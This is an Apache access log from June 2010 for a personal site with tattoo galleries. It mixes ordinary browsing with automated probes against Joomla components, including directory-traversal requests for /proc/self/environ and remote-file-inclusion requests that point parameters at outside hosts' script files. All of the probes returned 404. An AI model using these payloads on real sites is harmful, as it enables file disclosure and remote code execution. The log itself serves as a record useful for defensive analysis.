67.195.112.180 - - [28/Jun/2010:06:34:26 -0500] "GET /logs/access_log.1201219200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.178 - - [28/Jun/2010:06:34:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.162.118.240 - - [28/Jun/2010:06:35:12 -0500] "GET /index1.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
117.102.100.183 - - [28/Jun/2010:06:38:00 -0500] "GET /logs/access_log.1275696000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
117.102.100.183 - - [28/Jun/2010:06:38:06 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
117.102.100.183 - - [28/Jun/2010:06:38:08 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.7.108.242 - - [28/Jun/2010:06:39:48 -0500] "GET /logs/access_log.1274572800/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 397 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:39:48 -0500] "GET /option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 370 "-""libwww-perl/5.803"
207.7.108.242 - - [28/Jun/2010:06:39:48 -0500] "GET /logs/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 375 "-""libwww-perl/5.803"
213.179.32.13 - - [28/Jun/2010:06:41:11 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.829"
213.179.32.13 - - [28/Jun/2010:06:41:12 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.829"
213.179.32.13 - - [28/Jun/2010:06:41:12 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.829"
207.7.108.242 - - [28/Jun/2010:06:44:35 -0500] "GET /logs/access_log.1277164800/option=com_myblog&Itemid=12&task=http://linuxnewsnow.com/xmlrpc/cache/myid.jpg? HTTP/1.1" 404 397 "-""libwww-perl/5.803"
67.205.67.73 - - [28/Jun/2010:06:45:02 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
67.205.67.73 - - [28/Jun/2010:06:45:02 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
93.186.192.124 - - [28/Jun/2010:06:47:41 -0500] "GET ///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:41 -0500] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:41 -0500] "GET /logs/access_log.1275868800%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:43 -0500] "GET ///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:43 -0500] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:43 -0500] "GET /logs/access_log.1275868800%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:45 -0500] "GET /logs/access_log.1275609600%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:46 -0500] "GET ///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:46 -0500] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:46 -0500] "GET /logs/access_log.1275868800%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:46 -0500] "GET /logs/access_log.1275609600%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:47:47 -0500] "GET /logs/access_log.1275609600%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
168.91.255.100 - - [28/Jun/2010:06:49:22 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/search?q=ventage+tattoo&qs=n&sk=&first=21&FORM=PERE1""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:22 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:49:48 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:19 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:20 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:20 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:20 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:20 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:20 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:20 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:20 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:21 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:21 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:21 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:37 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:53 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:54 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:54 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:50:54 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
168.91.255.100 - - [28/Jun/2010:06:51:35 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET /logs/access_log.1275868800%20%20///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET ///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:06:52:03 -0500] "GET ///index.php?option=com_ninjarsssyndicator&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
